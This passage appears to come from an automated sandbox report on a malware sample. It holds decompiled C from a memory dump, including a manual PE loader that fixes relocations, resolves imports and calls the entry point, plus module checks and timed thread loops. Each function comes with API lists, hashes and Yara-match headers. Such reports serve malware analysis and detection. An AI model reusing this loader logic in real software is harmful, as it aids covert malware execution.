                                    							_t117 = _t272 + 0x6c;
                                    							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                    							__eflags =  *_t117;
                                    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                    							_t234 =  *_t119;
                                    						}
                                    						__eflags =  *(_t272 + 0x16c0) - _t234;
                                    						if( *(_t272 + 0x16c0) < _t234) {
                                    							 *(_t272 + 0x16c0) = _t234;
                                    						}
                                    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                    						_t123 = _t272 + 0xc; // 0x452bf84d
                                    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                    						__eflags = _t257 - 0xffff;
                                    						_t258 =  >  ? 0xffff : _t257;
                                    						_t124 = _t272 + 0x2c; // 0x8df075ff
                                    						_t151 =  *_t124;
                                    						_t125 = _t272 + 0x5c; // 0x84e85000
                                    						_t235 = _t234 -  *_t125;
                                    						__eflags = _t258 - _t151;
                                    						_t152 =  <=  ? _t258 : _t151;
                                    						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                    						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                    							L49:
                                    							__eflags = _t235 - _t258;
                                    							_t154 =  >  ? _t258 : _t235;
                                    							_a4 =  >  ? _t258 : _t235;
                                    							__eflags = _t222 - 4;
                                    							if(_t222 != 4) {
                                    								L53:
                                    								_t269 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t161 =  *_t272;
                                    								__eflags =  *(_t161 + 4);
                                    								_t154 = _a4;
                                    								if( *(_t161 + 4) != 0) {
                                    									goto L53;
                                    								} else {
                                    									__eflags = _t154 - _t235;
                                    									if(_t154 != _t235) {
                                    										goto L53;
                                    									} else {
                                    										_t269 = _t222 - 3;
                                    									}
                                    								}
                                    							}
                                    							_t131 = _t272 + 0x38; // 0xf47d8bff
                                    							_t132 = _t272 + 0x5c; // 0x84e85000
                                    							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                    							_t134 = _t272 + 0x5c;
                                    							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                    							__eflags =  *_t134;
                                    							E10014AF0( *_t134,  *_t272);
                                    						} else {
                                    							__eflags = _t235;
                                    							if(_t235 != 0) {
                                    								L46:
                                    								__eflags = _t222;
                                    								if(_t222 != 0) {
                                    									_t162 =  *_t272;
                                    									__eflags =  *(_t162 + 4);
                                    									if( *(_t162 + 4) == 0) {
                                    										__eflags = _t235 - _t258;
                                    										if(_t235 <= _t258) {
                                    											goto L49;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__eflags = _t222 - 4;
                                    								if(_t222 == 4) {
                                    									goto L46;
                                    								}
                                    							}
                                    						}
                                    						asm("sbb edi, edi");
                                    						_t271 =  ~_t269 & 0x00000002;
                                    						__eflags = _t271;
                                    						return _t271;
                                    					} else {
                                    						__eflags = _t218 - 4;
                                    						if(_t218 == 4) {
                                    							goto L34;
                                    						} else {
                                    							_t173 =  *_t272;
                                    							__eflags =  *(_t173 + 4);
                                    							if( *(_t173 + 4) != 0) {
                                    								goto L34;
                                    							} else {
                                    								_t88 = _t272 + 0x5c; // 0x84e85000
                                    								__eflags = _t254 -  *_t88;
                                    								if(_t254 !=  *_t88) {
                                    									goto L34;
                                    								} else {
                                    									return 1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					return 3;
                                    				}
                                    			}


                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                                    • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                    				char _v516;
                                    				char _v556;
                                    				char _v564;
                                    				char _v568;
                                    				char _v572;
                                    				char _v576;
                                    				intOrPtr _v580;
                                    				char _v588;
                                    				signed int _v596;
                                    				intOrPtr _v602;
                                    				intOrPtr _v604;
                                    				char _v608;
                                    				CHAR* _v612;
                                    				CHAR* _v616;
                                    				signed int _v620;
                                    				signed int _v624;
                                    				signed int _v628;
                                    				signed int _v632;
                                    				char _v636;
                                    				intOrPtr _t119;
                                    				signed int _t122;
                                    				CHAR* _t124;
                                    				intOrPtr _t125;
                                    				CHAR* _t127;
                                    				WCHAR* _t130;
                                    				intOrPtr _t133;
                                    				intOrPtr _t137;
                                    				WCHAR* _t138;
                                    				intOrPtr _t142;
                                    				WCHAR* _t143;
                                    				CHAR* _t144;
                                    				intOrPtr _t145;
                                    				intOrPtr _t150;
                                    				intOrPtr _t153;
                                    				WCHAR* _t154;
                                    				signed int _t159;
                                    				WCHAR* _t160;
                                    				intOrPtr _t163;
                                    				intOrPtr _t165;
                                    				intOrPtr _t166;
                                    				intOrPtr _t170;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				intOrPtr _t182;
                                    				WCHAR* _t184;
                                    				char _t186;
                                    				WCHAR* _t188;
                                    				intOrPtr _t200;
                                    				intOrPtr _t211;
                                    				signed int _t215;
                                    				char _t220;
                                    				WCHAR* _t231;
                                    				intOrPtr _t235;
                                    				intOrPtr _t238;
                                    				intOrPtr _t239;
                                    				intOrPtr _t246;
                                    				signed int _t248;
                                    				WCHAR* _t249;
                                    				CHAR* _t250;
                                    				intOrPtr _t262;
                                    				void* _t271;
                                    				intOrPtr _t272;
                                    				signed int _t277;
                                    				void* _t278;
                                    				intOrPtr _t280;
                                    				signed int _t282;
                                    				void* _t298;
                                    				void* _t299;
                                    				intOrPtr _t305;
                                    				CHAR* _t326;
                                    				void* _t328;
                                    				WCHAR* _t329;
                                    				intOrPtr _t331;
                                    				WCHAR* _t333;
                                    				signed int _t335;
                                    				intOrPtr* _t337;
                                    				void* _t338;
                                    				void* _t339;
                                    				void* _t353;
                                    
                                    				_t353 = __fp0;
                                    				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                    				_t119 =  *0x1001e688; // 0x8a40590
                                    				_v620 = _v620 & 0x00000000;
                                    				_t328 = __ecx;
                                    				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                    					L7:
                                    					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                                    					E1000A86D( &_v556, _t14, _t351);
                                    					_t298 = 0x64;
                                    					_t122 = E1000A471( &_v556, _t298);
                                    					 *0x1001e748 = _t122;
                                    					if(_t122 != 0) {
                                    						_push(0x4e5);
                                    						_t299 = 0x10;
                                    						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                                    						 *_t337 = 0x610;
                                    						_t124 = E100095E1(0x1001b9cc);
                                    						_push(0);
                                    						_push(_t124);
                                    						_v612 = _t124;
                                    						_t125 =  *0x1001e688; // 0x8a40590
                                    						_t127 = E100092E5(_t125 + 0x228);
                                    						_t338 = _t337 + 0xc;
                                    						_v616 = _t127;
                                    						E100085D5( &_v612);
                                    						_t130 = E1000B269(_t127);
                                    						_t246 = 3;
                                    						__eflags = _t130;
                                    						if(_t130 != 0) {
                                    							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                    							 *_t328 = _t246;
                                    						}
                                    						E1000861A( &_v616, 0xfffffffe);
                                    						_t133 =  *0x1001e688; // 0x8a40590
                                    						_t22 = _t133 + 0x114; // 0x8a406a4
                                    						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                    						_t262 =  *0x1001e688; // 0x8a40590
                                    						_t339 = _t338 + 0x14;
                                    						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                    						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                    							L17:
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							_v572 = _t328;
                                    							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                    							_t137 =  *0x1001e680; // 0x0
                                    							_t138 =  *(_t137 + 8);
                                    							__eflags = _t138;
                                    							if(_t138 != 0) {
                                    								 *_t138(0, 0, 1,  &_v568,  &_v564);
                                    							}
                                    							_v620 = _v620 & 0x00000000;
                                    							E1000E2C6(_t353,  &_v576);
                                    							_pop(_t262);
                                    							_t142 =  *0x1001e6b4; // 0x8abfc48
                                    							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                    							__eflags = _t143;
                                    							if(_t143 == 0) {
                                    								E1000E2C6(_t353,  &_v588);
                                    								_t235 =  *0x1001e6b4; // 0x8abfc48
                                    								_pop(_t262);
                                    								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                    							}
                                    							__eflags =  *0x1001e73c;
                                    							if( *0x1001e73c <= 0) {
                                    								goto L36;
                                    							} else {
                                    								_t165 =  *0x1001e680; // 0x0
                                    								__eflags =  *(_t165 + 8);
                                    								if( *(_t165 + 8) != 0) {
                                    									_t231 =  *(_t165 + 0xc);
                                    									__eflags = _t231;
                                    									if(_t231 != 0) {
                                    										 *_t231(_v580);
                                    									}
                                    								}
                                    								_t166 =  *0x1001e688; // 0x8a40590
                                    								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                    								__eflags = _t262 - _t246;
                                    								if(_t262 == _t246) {
                                    									goto L36;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                    									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                    										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                    										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                    											E100049A5();
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											_t170 =  *0x1001e684; // 0x8abfaa0
                                    											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                    											_t262 = _v602;
                                    											_t248 = 0x3c;
                                    											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                    											_v596 = _t173;
                                    											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                    											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                    											_v624 = _t178;
                                    											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                    											_t182 =  *0x1001e688; // 0x8a40590
                                    											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                    											_t339 = _t339 + 0xc;
                                    											__eflags = _t184;
                                    											if(_t184 >= 0) {
                                    												_t333 = E10008604(0x1000);
                                    												_v616 = _t333;
                                    												_pop(_t262);
                                    												__eflags = _t333;
                                    												if(_t333 != 0) {
                                    													_t186 = E1000109A(_t262, 0x148);
                                    													_t305 =  *0x1001e688; // 0x8a40590
                                    													_v636 = _t186;
                                    													_push(_t305 + 0x648);
                                    													_push(0xa);
                                    													_push(7);
                                    													_t271 = 2;
                                    													E1000902D(_t271,  &_v572);
                                    													_t272 =  *0x1001e688; // 0x8a40590
                                    													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                    													_t339 = _t339 + 0x18;
                                    													_v632 = _t188;
                                    													__eflags = _t188;
                                    													if(_t188 != 0) {
                                    														_push(_v624 % _t248 & 0x0000ffff);
                                    														_push(_v628 & 0x0000ffff);
                                    														_push(_v596 % _t248 & 0x0000ffff);
                                    														_push(_v620 & 0x0000ffff);
                                    														_push(_v632);
                                    														_push( &_v572);
                                    														_t200 =  *0x1001e688; // 0x8a40590
                                    														__eflags = _t200 + 0x1020;
                                    														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                    														E100085D5( &_v636);
                                    														E1000A911(_t333, 0, 0xbb8, 1);
                                    														E1000861A( &_v632, 0xfffffffe);
                                    														_t339 = _t339 + 0x44;
                                    													}
                                    													E1000861A( &_v616, 0xfffffffe);
                                    													_pop(_t262);
                                    												}
                                    											}
                                    										}
                                    										goto L36;
                                    									}
                                    									__eflags = _t262 - 2;
                                    									if(_t262 != 2) {
                                    										goto L36;
                                    									}
                                    									E100049A5();
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									_t211 =  *0x1001e684; // 0x8abfaa0
                                    									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                    									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                    									_v628 = _t215;
                                    									_t277 = 0x3c;
                                    									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                    									_t249 = E10008604(0x1000);
                                    									_v624 = _t249;
                                    									_pop(_t278);
                                    									__eflags = _t249;
                                    									if(_t249 != 0) {
                                    										_t220 = E100095E1(_t278, 0x32d);
                                    										_t280 =  *0x1001e688; // 0x8a40590
                                    										_push(_t280 + 0x228);
                                    										_t282 = 0x3c;
                                    										_v636 = _t220;
                                    										_push(_v628 % _t282 & 0x0000ffff);
                                    										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                    										E100085D5( &_v636);
                                    										E1000A911(_t249, 0, 0xbb8, 1);
                                    										E1000861A( &_v624, 0xfffffffe);
                                    									}
                                    									goto L41;
                                    								}
                                    							}
                                    						} else {
                                    							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                    							__eflags = _t238 - _t246;
                                    							if(_t238 == _t246) {
                                    								goto L17;
                                    							}
                                    							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                    							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                    								L36:
                                    								_t144 = E100095E1(_t262, 0x610);
                                    								_push(0);
                                    								_push(_t144);
                                    								_v616 = _t144;
                                    								_t145 =  *0x1001e688; // 0x8a40590
                                    								_t329 = E100092E5(_t145 + 0x228);
                                    								_v612 = _t329;
                                    								__eflags = _t329;
                                    								if(_t329 != 0) {
                                    									_t160 = E1000B269(_t329);
                                    									__eflags = _t160;
                                    									if(_t160 != 0) {
                                    										_t163 =  *0x1001e684; // 0x8abfaa0
                                    										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                    									}
                                    									E1000861A( &_v612, 0xfffffffe);
                                    								}
                                    								E100085D5( &_v616);
                                    								_t150 =  *0x1001e688; // 0x8a40590
                                    								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                                    								_t153 =  *0x1001e688; // 0x8a40590
                                    								_t154 = _t153 + 0x228;
                                    								__eflags = _t154;
                                    								lstrcpynW(_t154,  *0x1001e738, 0x105);
                                    								_t331 =  *0x1001e688; // 0x8a40590
                                    								_t117 = _t331 + 0x228; // 0x8a407b8
                                    								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                                    								E1000861A(0x1001e740, 0xfffffffe);
                                    								E1000861A(0x1001e738, 0xfffffffe);
                                    								L41:
                                    								_t159 = 0;
                                    								__eflags = 0;
                                    								L42:
                                    								return _t159;
                                    							}
                                    							__eflags = _t238 - 2;
                                    							if(_t238 != 2) {
                                    								goto L36;
                                    							}
                                    							goto L17;
                                    						}
                                    					}
                                    					L8:
                                    					_t159 = _t122 | 0xffffffff;
                                    					goto L42;
                                    				}
                                    				_t250 = E100095C7(0x6e2);
                                    				_v616 = _t250;
                                    				_t326 = E100095C7(0x9f5);
                                    				_v612 = _t326;
                                    				if(_t250 != 0 && _t326 != 0) {
                                    					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                    						_v620 = 1;
                                    					}
                                    					E100085C2( &_v616);
                                    					_t122 = E100085C2( &_v612);
                                    					_t351 = _v620;
                                    					if(_v620 != 0) {
                                    						goto L8;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                                    • lstrcpynW.KERNEL32(08A40158,00000105), ref: 1000526F
                                    • lstrcpynW.KERNEL32(08A40368,00000105), ref: 10005283
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleModulelstrcpyn
                                    • String ID:
                                    • API String ID: 3430401031-0
                                    • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                    • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                                    • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                    • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				signed int _v5;
                                    				signed short _v12;
                                    				intOrPtr* _v16;
                                    				signed int* _v20;
                                    				intOrPtr _v24;
                                    				unsigned int _v28;
                                    				signed short* _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr* _v40;
                                    				signed short* _v44;
                                    				intOrPtr _v48;
                                    				unsigned int _v52;
                                    				intOrPtr _v56;
                                    				_Unknown_base(*)()* _v60;
                                    				signed int _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				unsigned int _v76;
                                    				intOrPtr _v80;
                                    				signed int _v84;
                                    				intOrPtr _v88;
                                    				signed int _t149;
                                    				void* _t189;
                                    				signed int _t194;
                                    				signed int _t196;
                                    				intOrPtr _t236;
                                    
                                    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    				_v24 = _v72;
                                    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                    				_v56 = _t236;
                                    				if(_t236 == 0) {
                                    					L13:
                                    					while(0 != 0) {
                                    					}
                                    					_push(8);
                                    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                    						L35:
                                    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                    						while(0 != 0) {
                                    						}
                                    						if(_a12 != 0) {
                                    							 *_a12 = _v68;
                                    						}
                                    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                    						return _v68(_a4, 1, _a8);
                                    					}
                                    					_v84 = 0x80000000;
                                    					_t149 = 8;
                                    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						if(_v36 == 0) {
                                    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						}
                                    						if(_v36 != 0) {
                                    							if( *_v16 == 0) {
                                    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                    							} else {
                                    								_v20 =  *_v16 + _a4;
                                    							}
                                    							_v64 = _v64 & 0x00000000;
                                    							while( *_v20 != 0) {
                                    								if(( *_v20 & _v84) == 0) {
                                    									_v88 =  *_v20 + _a4;
                                    									_v60 = GetProcAddress(_v36, _v88 + 2);
                                    								} else {
                                    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                    								}
                                    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                    									 *_v20 = _v60;
                                    								} else {
                                    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                    								}
                                    								_v20 =  &(_v20[1]);
                                    								_v64 = _v64 + 4;
                                    							}
                                    							_v16 = _v16 + 0x14;
                                    							continue;
                                    						} else {
                                    							_t189 = 0xfffffffd;
                                    							return _t189;
                                    						}
                                    					}
                                    					goto L35;
                                    				}
                                    				_t194 = 8;
                                    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                    				_t196 = 8;
                                    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                    				while(0 != 0) {
                                    				}
                                    				while(_v48 > 0) {
                                    					_v28 = _v44[2];
                                    					_v48 = _v48 - _v28;
                                    					_v28 = _v28 - 8;
                                    					_v28 = _v28 >> 1;
                                    					_v32 =  &(_v44[4]);
                                    					_v80 = _a4 +  *_v44;
                                    					_v52 = _v28;
                                    					while(1) {
                                    						_v76 = _v52;
                                    						_v52 = _v52 - 1;
                                    						if(_v76 == 0) {
                                    							break;
                                    						}
                                    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                    						_v12 =  *_v32 & 0xfff;
                                    						_v40 = (_v12 & 0x0000ffff) + _v80;
                                    						if((_v5 & 0x000000ff) != 3) {
                                    							if((_v5 & 0x000000ff) == 0xa) {
                                    								 *_v40 =  *_v40 + _v56;
                                    							}
                                    						} else {
                                    							 *_v40 =  *_v40 + _v56;
                                    						}
                                    						_v32 =  &(_v32[1]);
                                    					}
                                    					_v44 = _v32;
                                    				}
                                    				goto L13;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                                    • LoadLibraryA.KERNEL32(?), ref: 10012C65
                                    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 384173800-0
                                    • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                    • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                                    • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                    • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t13;
                                    				intOrPtr _t15;
                                    				signed int _t16;
                                    				intOrPtr _t17;
                                    				signed int _t18;
                                    				char _t20;
                                    				intOrPtr _t22;
                                    				void* _t23;
                                    				void* _t24;
                                    				intOrPtr _t29;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t48;
                                    				void* _t51;
                                    				signed int _t61;
                                    				signed int _t64;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t61 = __ecx;
                                    				_t41 =  *0x1001e6dc; // 0x0
                                    				_t13 = E1000A4BF(_t41, 0);
                                    				while(_t13 < 0) {
                                    					E1000980C( &_v28);
                                    					_t43 =  *0x1001e6e0; // 0x0
                                    					_t15 =  *0x1001e6e4; // 0x0
                                    					_t41 = _t43 + 0xe10;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t15 - _v24;
                                    					if(__eflags > 0) {
                                    						L9:
                                    						_t16 = 0xfffffffe;
                                    						L13:
                                    						return _t16;
                                    					}
                                    					if(__eflags < 0) {
                                    						L4:
                                    						_t17 =  *0x1001e684; // 0x8abfaa0
                                    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                                    						__eflags = _t18;
                                    						if(_t18 == 0) {
                                    							break;
                                    						}
                                    						_t35 =  *0x1001e684; // 0x8abfaa0
                                    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                    						_t41 =  *0x1001e6dc; // 0x0
                                    						__eflags = 0;
                                    						_t13 = E1000A4BF(_t41, 0);
                                    						continue;
                                    					}
                                    					__eflags = _t41 - _v28;
                                    					if(_t41 >= _v28) {
                                    						goto L9;
                                    					}
                                    					goto L4;
                                    				}
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t20 =  *0x1001e6e8; // 0x0
                                    				_v28 = _t20;
                                    				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                                    				_v20 = _t22;
                                    				if(_t22 != 0) {
                                    					_t23 = GetCurrentProcess();
                                    					_t24 = GetCurrentThread();
                                    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                                    					E1000980C(0x1001e6e0);
                                    					_t64 = E10001A1B( &_v28, E10001226, _t71);
                                    					__eflags = _t64;
                                    					if(_t64 >= 0) {
                                    						_push(0);
                                    						_push( *0x1001e760);
                                    						_t51 = 0x27;
                                    						E10009F06(_t51);
                                    					}
                                    				} else {
                                    					_t64 = _t61 | 0xffffffff;
                                    				}
                                    				_t29 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                                    				_t48 =  *0x1001e6dc; // 0x0
                                    				 *0x1001e6d0 = 0;
                                    				E1000A4DB(_t48);
                                    				E1000861A( &_v24, 0);
                                    				_t16 = _t64;
                                    				goto L13;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                    • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                                    • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                    • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E10001B2D(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				void* _t12;
                                    				intOrPtr _t14;
                                    				void* _t15;
                                    				intOrPtr _t16;
                                    				void* _t17;
                                    				void* _t19;
                                    				void* _t20;
                                    				char _t24;
                                    				intOrPtr _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr _t46;
                                    				void* _t48;
                                    				intOrPtr _t51;
                                    				void* _t61;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t38 =  *0x1001e6f4; // 0x0
                                    				_t12 = E1000A4BF(_t38, 0);
                                    				while(_t12 < 0) {
                                    					E1000980C( &_v28);
                                    					_t40 =  *0x1001e700; // 0x0
                                    					_t14 =  *0x1001e704; // 0x0
                                    					_t41 = _t40 + 0x3840;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t14 - _v24;
                                    					if(__eflags > 0) {
                                    						L13:
                                    						_t15 = 0;
                                    					} else {
                                    						if(__eflags < 0) {
                                    							L4:
                                    							_t16 =  *0x1001e684; // 0x8abfaa0
                                    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                                    							__eflags = _t17;
                                    							if(_t17 == 0) {
                                    								break;
                                    							} else {
                                    								_t33 =  *0x1001e684; // 0x8abfaa0
                                    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                    								_t51 =  *0x1001e6f4; // 0x0
                                    								__eflags = 0;
                                    								_t12 = E1000A4BF(_t51, 0);
                                    								continue;
                                    							}
                                    						} else {
                                    							__eflags = _t41 - _v28;
                                    							if(_t41 >= _v28) {
                                    								goto L13;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    					}
                                    					L12:
                                    					return _t15;
                                    				}
                                    				E1000980C(0x1001e700);
                                    				_t19 = GetCurrentProcess();
                                    				_t20 = GetCurrentThread();
                                    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 =  *0x1001e6e8; // 0x0
                                    				_v28 = _t24;
                                    				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                                    				if(_t61 >= 0) {
                                    					_push(0);
                                    					_push( *0x1001e760);
                                    					_t48 = 0x27;
                                    					E10009F06(_t48);
                                    				}
                                    				if(_v24 != 0) {
                                    					E10006890( &_v24);
                                    				}
                                    				_t26 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                                    				_t28 =  *0x1001e758; // 0x0
                                    				 *0x1001e6ec = 0;
                                    				_t29 =  !=  ? 1 : _t28;
                                    				_t46 =  *0x1001e6f4; // 0x0
                                    				 *0x1001e758 =  !=  ? 1 : _t28;
                                    				E1000A4DB(_t46);
